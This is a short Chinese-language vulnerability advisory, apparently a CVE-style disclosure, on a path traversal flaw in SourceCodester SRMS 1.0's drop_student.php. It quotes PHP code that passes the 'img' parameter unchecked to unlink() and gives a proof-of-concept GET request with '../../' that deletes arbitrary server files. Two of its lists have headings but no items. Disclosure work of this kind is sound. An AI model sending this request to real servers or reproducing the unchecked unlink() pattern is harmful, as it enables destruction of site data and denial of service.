SourceCodester 学生成绩管理系统(SRMS)1.0 的 drop_student.php 端点存在路径遍历漏洞。
该应用程序从 img GET 参数获取用户可控输入,并在未经验证的情况下直接将其传递给 unlink() 函数,从而允许删除服务器上的任意文件。
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
攻击者可以删除 Web 服务器可访问的任意文件,包括:
这可能会导致拒绝服务或进一步利用。
与之前报告的 SRMS 问题相比,该漏洞代表了一种独特的攻击向量,因为它:
SourceCodester
学生成绩管理系统(SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi